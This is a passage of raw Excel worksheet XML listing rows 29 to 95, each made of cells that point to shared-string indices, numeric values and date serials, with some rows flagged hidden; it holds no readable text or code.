      <c r="G29" s="3" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="30" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A30" t="s">
        <v>132</v>
      </c>
      <c r="B30" t="s">
        <v>131</v>
      </c>
      <c r="C30">
        <v>992</v>
      </c>
      <c r="D30" t="s">
        <v>10</v>
      </c>
      <c r="E30" t="s">
        <v>8</v>
      </c>
      <c r="F30" t="s">
        <v>10</v>
      </c>
      <c r="G30" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="31" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A31" t="s">
        <v>1245</v>
      </c>
      <c r="B31" t="s">
        <v>116</v>
      </c>
      <c r="C31">
        <v>2288</v>
      </c>
      <c r="D31" t="s">
        <v>8</v>
      </c>
      <c r="E31" t="s">
        <v>10</v>
      </c>
      <c r="F31" t="s">
        <v>8</v>
      </c>
      <c r="G31" t="s">
        <v>8</v>
      </c>
      <c r="H31" s="1">
        <v>43534</v>
      </c>
      <c r="I31" t="s">
        <v>1234</v>
      </c>
    </row>
    <row r="32" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A32" t="s">
        <v>1246</v>
      </c>
      <c r="B32" t="s">
        <v>131</v>
      </c>
      <c r="C32">
        <v>992</v>
      </c>
      <c r="D32" t="s">
        <v>8</v>
      </c>
      <c r="E32" t="s">
        <v>10</v>
      </c>
      <c r="F32" t="s">
        <v>8</v>
      </c>
      <c r="G32" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="33" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A33" t="s">
        <v>1247</v>
      </c>
      <c r="B33" t="s">
        <v>116</v>
      </c>
      <c r="C33">
        <v>2288</v>
      </c>
      <c r="D33" t="s">
        <v>8</v>
      </c>
      <c r="E33" t="s">
        <v>8</v>
      </c>
      <c r="F33" t="s">
        <v>10</v>
      </c>
      <c r="G33" t="s">
        <v>8</v>
      </c>
      <c r="H33" s="1">
        <v>43534</v>
      </c>
      <c r="I33" t="s">
        <v>1234</v>
      </c>
    </row>
    <row r="34" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A34" t="s">
        <v>1248</v>
      </c>
      <c r="B34" t="s">
        <v>141</v>
      </c>
      <c r="C34">
        <v>2412</v>
      </c>
      <c r="D34" t="s">
        <v>8</v>
      </c>
      <c r="E34" t="s">
        <v>10</v>
      </c>
      <c r="F34" t="s">
        <v>8</v>
      </c>
      <c r="G34" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="35" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A35" t="s">
        <v>139</v>
      </c>
      <c r="B35" t="s">
        <v>136</v>
      </c>
      <c r="C35">
        <v>3292</v>
      </c>
      <c r="D35" t="s">
        <v>10</v>
      </c>
      <c r="E35" t="s">
        <v>8</v>
      </c>
      <c r="F35" t="s">
        <v>10</v>
      </c>
      <c r="G35" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="36" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A36" t="s">
        <v>105</v>
      </c>
      <c r="B36" t="s">
        <v>104</v>
      </c>
      <c r="C36">
        <v>1740</v>
      </c>
      <c r="D36" t="s">
        <v>10</v>
      </c>
      <c r="E36" t="s">
        <v>8</v>
      </c>
      <c r="F36" t="s">
        <v>10</v>
      </c>
      <c r="G36" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="37" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A37" t="s">
        <v>1249</v>
      </c>
      <c r="B37" t="s">
        <v>64</v>
      </c>
      <c r="C37">
        <v>368</v>
      </c>
      <c r="D37" t="s">
        <v>8</v>
      </c>
      <c r="E37" t="s">
        <v>10</v>
      </c>
      <c r="F37" t="s">
        <v>8</v>
      </c>
      <c r="G37" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="38" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A38" t="s">
        <v>142</v>
      </c>
      <c r="B38" t="s">
        <v>141</v>
      </c>
      <c r="C38">
        <v>2412</v>
      </c>
      <c r="D38" t="s">
        <v>10</v>
      </c>
      <c r="E38" t="s">
        <v>8</v>
      </c>
      <c r="F38" t="s">
        <v>10</v>
      </c>
      <c r="G38" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="39" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A39" t="s">
        <v>1250</v>
      </c>
      <c r="B39" t="s">
        <v>104</v>
      </c>
      <c r="C39">
        <v>1740</v>
      </c>
      <c r="D39" t="s">
        <v>8</v>
      </c>
      <c r="E39" t="s">
        <v>10</v>
      </c>
      <c r="F39" t="s">
        <v>8</v>
      </c>
      <c r="G39" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="40" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A40" t="s">
        <v>1251</v>
      </c>
      <c r="B40" t="s">
        <v>77</v>
      </c>
      <c r="C40">
        <v>1444</v>
      </c>
      <c r="D40" t="s">
        <v>8</v>
      </c>
      <c r="E40" t="s">
        <v>10</v>
      </c>
      <c r="F40" t="s">
        <v>8</v>
      </c>
      <c r="G40" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="41" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A41" t="s">
        <v>1252</v>
      </c>
      <c r="B41" t="s">
        <v>136</v>
      </c>
      <c r="C41">
        <v>3292</v>
      </c>
      <c r="D41" t="s">
        <v>8</v>
      </c>
      <c r="E41" t="s">
        <v>10</v>
      </c>
      <c r="F41" t="s">
        <v>8</v>
      </c>
      <c r="G41" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="42" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A42" t="s">
        <v>1253</v>
      </c>
      <c r="B42" t="s">
        <v>61</v>
      </c>
      <c r="C42">
        <v>376</v>
      </c>
      <c r="D42" t="s">
        <v>8</v>
      </c>
      <c r="E42" t="s">
        <v>10</v>
      </c>
      <c r="F42" t="s">
        <v>8</v>
      </c>
      <c r="G42" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="43" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A43" t="s">
        <v>67</v>
      </c>
      <c r="B43" t="s">
        <v>61</v>
      </c>
      <c r="C43">
        <v>376</v>
      </c>
      <c r="D43" t="s">
        <v>10</v>
      </c>
      <c r="E43" t="s">
        <v>8</v>
      </c>
      <c r="F43" t="s">
        <v>10</v>
      </c>
      <c r="G43" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="44" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A44" t="s">
        <v>60</v>
      </c>
      <c r="B44" t="s">
        <v>59</v>
      </c>
      <c r="C44">
        <v>252</v>
      </c>
      <c r="D44" t="s">
        <v>10</v>
      </c>
      <c r="E44" t="s">
        <v>8</v>
      </c>
      <c r="F44" t="s">
        <v>10</v>
      </c>
      <c r="G44" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="45" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A45" t="s">
        <v>1254</v>
      </c>
      <c r="B45" t="s">
        <v>59</v>
      </c>
      <c r="C45">
        <v>252</v>
      </c>
      <c r="D45" t="s">
        <v>8</v>
      </c>
      <c r="E45" t="s">
        <v>10</v>
      </c>
      <c r="F45" t="s">
        <v>8</v>
      </c>
      <c r="G45" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="46" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A46" t="s">
        <v>85</v>
      </c>
      <c r="B46" t="s">
        <v>77</v>
      </c>
      <c r="C46">
        <v>876</v>
      </c>
      <c r="D46" t="s">
        <v>10</v>
      </c>
      <c r="E46" t="s">
        <v>8</v>
      </c>
      <c r="F46" t="s">
        <v>10</v>
      </c>
      <c r="G46" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="47" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A47" t="s">
        <v>111</v>
      </c>
      <c r="B47" t="s">
        <v>77</v>
      </c>
      <c r="C47">
        <v>2604</v>
      </c>
      <c r="D47" t="s">
        <v>10</v>
      </c>
      <c r="E47" t="s">
        <v>8</v>
      </c>
      <c r="F47" t="s">
        <v>10</v>
      </c>
      <c r="G47" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="48" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A48" t="s">
        <v>1255</v>
      </c>
      <c r="B48" t="s">
        <v>77</v>
      </c>
      <c r="C48">
        <v>876</v>
      </c>
      <c r="D48" t="s">
        <v>8</v>
      </c>
      <c r="E48" t="s">
        <v>10</v>
      </c>
      <c r="F48" t="s">
        <v>8</v>
      </c>
      <c r="G48" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A49" t="s">
        <v>1256</v>
      </c>
      <c r="B49" t="s">
        <v>77</v>
      </c>
      <c r="C49">
        <v>2604</v>
      </c>
      <c r="D49" t="s">
        <v>8</v>
      </c>
      <c r="E49" t="s">
        <v>10</v>
      </c>
      <c r="F49" t="s">
        <v>8</v>
      </c>
      <c r="G49" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A50" t="s">
        <v>1257</v>
      </c>
      <c r="B50" t="s">
        <v>128</v>
      </c>
      <c r="C50">
        <v>2700</v>
      </c>
      <c r="D50" t="s">
        <v>8</v>
      </c>
      <c r="E50" t="s">
        <v>10</v>
      </c>
      <c r="F50" t="s">
        <v>8</v>
      </c>
      <c r="G50" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A51" t="s">
        <v>1258</v>
      </c>
      <c r="B51" t="s">
        <v>148</v>
      </c>
      <c r="C51">
        <v>1984</v>
      </c>
      <c r="D51" t="s">
        <v>8</v>
      </c>
      <c r="E51" t="s">
        <v>10</v>
      </c>
      <c r="F51" t="s">
        <v>8</v>
      </c>
      <c r="G51" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="52" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A52" t="s">
        <v>114</v>
      </c>
      <c r="B52" t="s">
        <v>113</v>
      </c>
      <c r="C52">
        <v>2624</v>
      </c>
      <c r="D52" t="s">
        <v>10</v>
      </c>
      <c r="E52" t="s">
        <v>8</v>
      </c>
      <c r="F52" t="s">
        <v>10</v>
      </c>
      <c r="G52" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A53" t="s">
        <v>1259</v>
      </c>
      <c r="B53" t="s">
        <v>113</v>
      </c>
      <c r="C53">
        <v>2624</v>
      </c>
      <c r="D53" t="s">
        <v>8</v>
      </c>
      <c r="E53" t="s">
        <v>10</v>
      </c>
      <c r="F53" t="s">
        <v>8</v>
      </c>
      <c r="G53" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="54" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A54" t="s">
        <v>97</v>
      </c>
      <c r="B54" t="s">
        <v>96</v>
      </c>
      <c r="C54">
        <v>1600</v>
      </c>
      <c r="D54" t="s">
        <v>10</v>
      </c>
      <c r="E54" t="s">
        <v>8</v>
      </c>
      <c r="F54" t="s">
        <v>10</v>
      </c>
      <c r="G54" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="55" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A55" t="s">
        <v>137</v>
      </c>
      <c r="B55" t="s">
        <v>136</v>
      </c>
      <c r="C55">
        <v>2480</v>
      </c>
      <c r="D55" t="s">
        <v>10</v>
      </c>
      <c r="E55" t="s">
        <v>8</v>
      </c>
      <c r="F55" t="s">
        <v>10</v>
      </c>
      <c r="G55" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A56" t="s">
        <v>1260</v>
      </c>
      <c r="B56" t="s">
        <v>96</v>
      </c>
      <c r="C56">
        <v>1600</v>
      </c>
      <c r="D56" t="s">
        <v>8</v>
      </c>
      <c r="E56" t="s">
        <v>10</v>
      </c>
      <c r="F56" t="s">
        <v>8</v>
      </c>
      <c r="G56" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A57" t="s">
        <v>1261</v>
      </c>
      <c r="B57" t="s">
        <v>136</v>
      </c>
      <c r="C57">
        <v>2480</v>
      </c>
      <c r="D57" t="s">
        <v>8</v>
      </c>
      <c r="E57" t="s">
        <v>10</v>
      </c>
      <c r="F57" t="s">
        <v>8</v>
      </c>
      <c r="G57" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A58" t="s">
        <v>1262</v>
      </c>
      <c r="B58" t="s">
        <v>80</v>
      </c>
      <c r="C58">
        <v>640</v>
      </c>
      <c r="D58" t="s">
        <v>8</v>
      </c>
      <c r="E58" t="s">
        <v>10</v>
      </c>
      <c r="F58" t="s">
        <v>8</v>
      </c>
      <c r="G58" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="59" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A59" t="s">
        <v>107</v>
      </c>
      <c r="B59" t="s">
        <v>106</v>
      </c>
      <c r="C59">
        <v>1932</v>
      </c>
      <c r="D59" t="s">
        <v>10</v>
      </c>
      <c r="E59" t="s">
        <v>8</v>
      </c>
      <c r="F59" t="s">
        <v>10</v>
      </c>
      <c r="G59" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A60" t="s">
        <v>1263</v>
      </c>
      <c r="B60" t="s">
        <v>106</v>
      </c>
      <c r="C60">
        <v>1932</v>
      </c>
      <c r="D60" t="s">
        <v>8</v>
      </c>
      <c r="E60" t="s">
        <v>10</v>
      </c>
      <c r="F60" t="s">
        <v>8</v>
      </c>
      <c r="G60" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A61" t="s">
        <v>1264</v>
      </c>
      <c r="B61" t="s">
        <v>75</v>
      </c>
      <c r="C61">
        <v>480</v>
      </c>
      <c r="D61" t="s">
        <v>8</v>
      </c>
      <c r="E61" t="s">
        <v>10</v>
      </c>
      <c r="F61" t="s">
        <v>8</v>
      </c>
      <c r="G61" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="62" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A62" t="s">
        <v>74</v>
      </c>
      <c r="B62" t="s">
        <v>73</v>
      </c>
      <c r="C62">
        <v>472</v>
      </c>
      <c r="D62" t="s">
        <v>10</v>
      </c>
      <c r="E62" t="s">
        <v>8</v>
      </c>
      <c r="F62" t="s">
        <v>10</v>
      </c>
      <c r="G62" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A63" t="s">
        <v>1265</v>
      </c>
      <c r="B63" t="s">
        <v>73</v>
      </c>
      <c r="C63">
        <v>472</v>
      </c>
      <c r="D63" t="s">
        <v>8</v>
      </c>
      <c r="E63" t="s">
        <v>10</v>
      </c>
      <c r="F63" t="s">
        <v>8</v>
      </c>
      <c r="G63" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="64" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A64" t="s">
        <v>99</v>
      </c>
      <c r="B64" t="s">
        <v>98</v>
      </c>
      <c r="C64">
        <v>1652</v>
      </c>
      <c r="D64" t="s">
        <v>10</v>
      </c>
      <c r="E64" t="s">
        <v>8</v>
      </c>
      <c r="F64" t="s">
        <v>10</v>
      </c>
      <c r="G64" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="65" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A65" t="s">
        <v>1266</v>
      </c>
      <c r="B65" t="s">
        <v>98</v>
      </c>
      <c r="C65">
        <v>1652</v>
      </c>
      <c r="D65" t="s">
        <v>8</v>
      </c>
      <c r="E65" t="s">
        <v>10</v>
      </c>
      <c r="F65" t="s">
        <v>8</v>
      </c>
      <c r="G65" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="66" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A66" t="s">
        <v>1267</v>
      </c>
      <c r="B66" t="s">
        <v>90</v>
      </c>
      <c r="C66">
        <v>1280</v>
      </c>
      <c r="D66" t="s">
        <v>8</v>
      </c>
      <c r="E66" t="s">
        <v>10</v>
      </c>
      <c r="F66" t="s">
        <v>8</v>
      </c>
      <c r="G66" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="67" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A67" t="s">
        <v>1268</v>
      </c>
      <c r="B67" t="s">
        <v>134</v>
      </c>
      <c r="C67">
        <v>1988</v>
      </c>
      <c r="D67" t="s">
        <v>8</v>
      </c>
      <c r="E67" t="s">
        <v>10</v>
      </c>
      <c r="F67" t="s">
        <v>8</v>
      </c>
      <c r="G67" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="68" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A68" t="s">
        <v>82</v>
      </c>
      <c r="B68" t="s">
        <v>77</v>
      </c>
      <c r="C68">
        <v>692</v>
      </c>
      <c r="D68" t="s">
        <v>10</v>
      </c>
      <c r="E68" t="s">
        <v>8</v>
      </c>
      <c r="F68" t="s">
        <v>10</v>
      </c>
      <c r="G68" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="69" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A69" t="s">
        <v>1269</v>
      </c>
      <c r="B69" t="s">
        <v>77</v>
      </c>
      <c r="C69">
        <v>692</v>
      </c>
      <c r="D69" t="s">
        <v>8</v>
      </c>
      <c r="E69" t="s">
        <v>10</v>
      </c>
      <c r="F69" t="s">
        <v>8</v>
      </c>
      <c r="G69" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="70" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A70" t="s">
        <v>1270</v>
      </c>
      <c r="B70" t="s">
        <v>68</v>
      </c>
      <c r="C70">
        <v>404</v>
      </c>
      <c r="D70" t="s">
        <v>8</v>
      </c>
      <c r="E70" t="s">
        <v>10</v>
      </c>
      <c r="F70" t="s">
        <v>8</v>
      </c>
      <c r="G70" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="71" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A71" t="s">
        <v>1271</v>
      </c>
      <c r="B71" t="s">
        <v>77</v>
      </c>
      <c r="C71">
        <v>1176</v>
      </c>
      <c r="D71" t="s">
        <v>8</v>
      </c>
      <c r="E71" t="s">
        <v>10</v>
      </c>
      <c r="F71" t="s">
        <v>8</v>
      </c>
      <c r="G71" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="72" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A72" t="s">
        <v>69</v>
      </c>
      <c r="B72" t="s">
        <v>68</v>
      </c>
      <c r="C72">
        <v>404</v>
      </c>
      <c r="D72" t="s">
        <v>10</v>
      </c>
      <c r="E72" t="s">
        <v>8</v>
      </c>
      <c r="F72" t="s">
        <v>10</v>
      </c>
      <c r="G72" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="73" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A73" t="s">
        <v>89</v>
      </c>
      <c r="B73" t="s">
        <v>77</v>
      </c>
      <c r="C73">
        <v>1176</v>
      </c>
      <c r="D73" t="s">
        <v>10</v>
      </c>
      <c r="E73" t="s">
        <v>8</v>
      </c>
      <c r="F73" t="s">
        <v>10</v>
      </c>
      <c r="G73" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="74" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A74" t="s">
        <v>91</v>
      </c>
      <c r="B74" t="s">
        <v>90</v>
      </c>
      <c r="C74">
        <v>1280</v>
      </c>
      <c r="D74" t="s">
        <v>10</v>
      </c>
      <c r="E74" t="s">
        <v>8</v>
      </c>
      <c r="F74" t="s">
        <v>10</v>
      </c>
      <c r="G74" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="75" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A75" t="s">
        <v>125</v>
      </c>
      <c r="B75" t="s">
        <v>102</v>
      </c>
      <c r="C75">
        <v>1540</v>
      </c>
      <c r="D75" t="s">
        <v>10</v>
      </c>
      <c r="E75" t="s">
        <v>8</v>
      </c>
      <c r="F75" t="s">
        <v>10</v>
      </c>
      <c r="G75" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="76" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A76" t="s">
        <v>129</v>
      </c>
      <c r="B76" t="s">
        <v>128</v>
      </c>
      <c r="C76">
        <v>2700</v>
      </c>
      <c r="D76" t="s">
        <v>10</v>
      </c>
      <c r="E76" t="s">
        <v>8</v>
      </c>
      <c r="F76" t="s">
        <v>10</v>
      </c>
      <c r="G76" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="77" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A77" t="s">
        <v>133</v>
      </c>
      <c r="B77" t="s">
        <v>131</v>
      </c>
      <c r="C77">
        <v>1776</v>
      </c>
      <c r="D77" t="s">
        <v>10</v>
      </c>
      <c r="E77" t="s">
        <v>8</v>
      </c>
      <c r="F77" t="s">
        <v>10</v>
      </c>
      <c r="G77" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="78" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A78" t="s">
        <v>135</v>
      </c>
      <c r="B78" t="s">
        <v>134</v>
      </c>
      <c r="C78">
        <v>1988</v>
      </c>
      <c r="D78" t="s">
        <v>10</v>
      </c>
      <c r="E78" t="s">
        <v>8</v>
      </c>
      <c r="F78" t="s">
        <v>10</v>
      </c>
      <c r="G78" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="79" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A79" t="s">
        <v>149</v>
      </c>
      <c r="B79" t="s">
        <v>148</v>
      </c>
      <c r="C79">
        <v>1984</v>
      </c>
      <c r="D79" t="s">
        <v>10</v>
      </c>
      <c r="E79" t="s">
        <v>8</v>
      </c>
      <c r="F79" t="s">
        <v>10</v>
      </c>
      <c r="G79" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="80" spans="1:7" hidden="1" x14ac:dyDescent="0.25">
      <c r="A80" t="s">
        <v>83</v>
      </c>
      <c r="B80" t="s">
        <v>77</v>
      </c>
      <c r="C80">
        <v>776</v>
      </c>
      <c r="D80" t="s">
        <v>10</v>
      </c>
      <c r="E80" t="s">
        <v>8</v>
      </c>
      <c r="F80" t="s">
        <v>10</v>
      </c>
      <c r="G80" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="81" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A81" t="s">
        <v>1272</v>
      </c>
      <c r="B81" t="s">
        <v>77</v>
      </c>
      <c r="C81">
        <v>776</v>
      </c>
      <c r="D81" t="s">
        <v>8</v>
      </c>
      <c r="E81" t="s">
        <v>10</v>
      </c>
      <c r="F81" t="s">
        <v>8</v>
      </c>
      <c r="G81" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="82" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A82" t="s">
        <v>1273</v>
      </c>
      <c r="B82" t="s">
        <v>119</v>
      </c>
      <c r="C82">
        <v>2312</v>
      </c>
      <c r="D82" t="s">
        <v>8</v>
      </c>
      <c r="E82" t="s">
        <v>8</v>
      </c>
      <c r="F82" t="s">
        <v>10</v>
      </c>
      <c r="G82" t="s">
        <v>8</v>
      </c>
      <c r="H82" s="1">
        <v>43534</v>
      </c>
      <c r="I82" t="s">
        <v>1234</v>
      </c>
    </row>
    <row r="83" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A83" t="s">
        <v>109</v>
      </c>
      <c r="B83" t="s">
        <v>77</v>
      </c>
      <c r="C83">
        <v>2044</v>
      </c>
      <c r="D83" t="s">
        <v>10</v>
      </c>
      <c r="E83" t="s">
        <v>8</v>
      </c>
      <c r="F83" t="s">
        <v>10</v>
      </c>
      <c r="G83" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="84" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A84" t="s">
        <v>1274</v>
      </c>
      <c r="B84" t="s">
        <v>77</v>
      </c>
      <c r="C84">
        <v>2044</v>
      </c>
      <c r="D84" t="s">
        <v>8</v>
      </c>
      <c r="E84" t="s">
        <v>10</v>
      </c>
      <c r="F84" t="s">
        <v>8</v>
      </c>
      <c r="G84" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="85" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A85" t="s">
        <v>1275</v>
      </c>
      <c r="B85" t="s">
        <v>96</v>
      </c>
      <c r="C85">
        <v>1700</v>
      </c>
      <c r="D85" t="s">
        <v>8</v>
      </c>
      <c r="E85" t="s">
        <v>10</v>
      </c>
      <c r="F85" t="s">
        <v>8</v>
      </c>
      <c r="G85" t="s">
        <v>8</v>
      </c>
      <c r="H85" s="1">
        <v>43534</v>
      </c>
      <c r="I85" t="s">
        <v>1238</v>
      </c>
    </row>
    <row r="86" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A86" t="s">
        <v>1276</v>
      </c>
      <c r="B86" t="s">
        <v>102</v>
      </c>
      <c r="C86">
        <v>1716</v>
      </c>
      <c r="D86" t="s">
        <v>8</v>
      </c>
      <c r="E86" t="s">
        <v>10</v>
      </c>
      <c r="F86" t="s">
        <v>8</v>
      </c>
      <c r="G86" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="87" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A87" t="s">
        <v>1277</v>
      </c>
      <c r="B87" t="s">
        <v>1278</v>
      </c>
      <c r="C87">
        <v>3348</v>
      </c>
      <c r="D87" t="s">
        <v>8</v>
      </c>
      <c r="E87" t="s">
        <v>8</v>
      </c>
      <c r="F87" t="s">
        <v>10</v>
      </c>
      <c r="G87" t="s">
        <v>8</v>
      </c>
      <c r="H87" s="1">
        <v>43534</v>
      </c>
      <c r="I87" t="s">
        <v>1279</v>
      </c>
    </row>
    <row r="88" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A88" t="s">
        <v>1280</v>
      </c>
      <c r="B88" t="s">
        <v>123</v>
      </c>
      <c r="C88">
        <v>2808</v>
      </c>
      <c r="D88" t="s">
        <v>8</v>
      </c>
      <c r="E88" t="s">
        <v>8</v>
      </c>
      <c r="F88" t="s">
        <v>10</v>
      </c>
      <c r="G88" t="s">
        <v>8</v>
      </c>
      <c r="H88" s="1">
        <v>43534</v>
      </c>
      <c r="I88" t="s">
        <v>1281</v>
      </c>
    </row>
    <row r="89" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A89" t="s">
        <v>120</v>
      </c>
      <c r="B89" t="s">
        <v>119</v>
      </c>
      <c r="C89">
        <v>3300</v>
      </c>
      <c r="D89" t="s">
        <v>10</v>
      </c>
      <c r="E89" t="s">
        <v>8</v>
      </c>
      <c r="F89" t="s">
        <v>10</v>
      </c>
      <c r="G89" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="90" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A90" t="s">
        <v>1282</v>
      </c>
      <c r="B90" t="s">
        <v>119</v>
      </c>
      <c r="C90">
        <v>3300</v>
      </c>
      <c r="D90" t="s">
        <v>8</v>
      </c>
      <c r="E90" t="s">
        <v>10</v>
      </c>
      <c r="F90" t="s">
        <v>8</v>
      </c>
      <c r="G90" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="91" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A91" t="s">
        <v>84</v>
      </c>
      <c r="B91" t="s">
        <v>77</v>
      </c>
      <c r="C91">
        <v>840</v>
      </c>
      <c r="D91" t="s">
        <v>10</v>
      </c>
      <c r="E91" t="s">
        <v>8</v>
      </c>
      <c r="F91" t="s">
        <v>10</v>
      </c>
      <c r="G91" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="92" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A92" t="s">
        <v>1283</v>
      </c>
      <c r="B92" t="s">
        <v>77</v>
      </c>
      <c r="C92">
        <v>840</v>
      </c>
      <c r="D92" t="s">
        <v>8</v>
      </c>
      <c r="E92" t="s">
        <v>10</v>
      </c>
      <c r="F92" t="s">
        <v>8</v>
      </c>
      <c r="G92" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="93" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A93" t="s">
        <v>54</v>
      </c>
      <c r="B93" t="s">
        <v>53</v>
      </c>
      <c r="C93">
        <v>4</v>
      </c>
      <c r="D93" t="s">
        <v>10</v>
      </c>
      <c r="E93" t="s">
        <v>8</v>
      </c>
      <c r="F93" t="s">
        <v>10</v>
      </c>
      <c r="G93" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="94" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A94" t="s">
        <v>1284</v>
      </c>
      <c r="B94" t="s">
        <v>53</v>
      </c>
      <c r="C94">
        <v>4</v>
      </c>
      <c r="D94" t="s">
        <v>8</v>
      </c>
      <c r="E94" t="s">
        <v>10</v>
      </c>
      <c r="F94" t="s">
        <v>8</v>
      </c>
      <c r="G94" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="95" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A95" t="s">
        <v>1285</v>
